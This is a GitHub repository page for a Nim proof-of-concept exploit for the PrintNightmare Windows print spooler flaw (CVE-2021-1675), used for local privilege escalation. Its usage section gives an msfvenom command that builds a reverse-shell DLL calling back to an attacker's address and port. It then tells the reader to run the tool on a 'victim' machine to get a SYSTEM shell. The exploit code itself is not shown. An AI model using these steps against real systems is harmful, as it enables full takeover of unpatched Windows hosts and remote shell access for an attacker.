Skip to content

CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)

Notifications You must be signed in to change notification settings

eversinc33/NimNightmare

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-1675 LPE PoC

not my exploit! just wanted to play around with the winim library in nim.

Usage

Generate DLL payload with msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.237 LPORT=4444 -f dll > msfvenom.dll, then start the handler on your attacker.

On the victim run .\nimnightmare.exe <ABSOLUTE_PATH_TO_DLL> and get a shell as SYSTEM.

About

CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)

Resources

Stars

Watchers

Forks

Packages

No packages published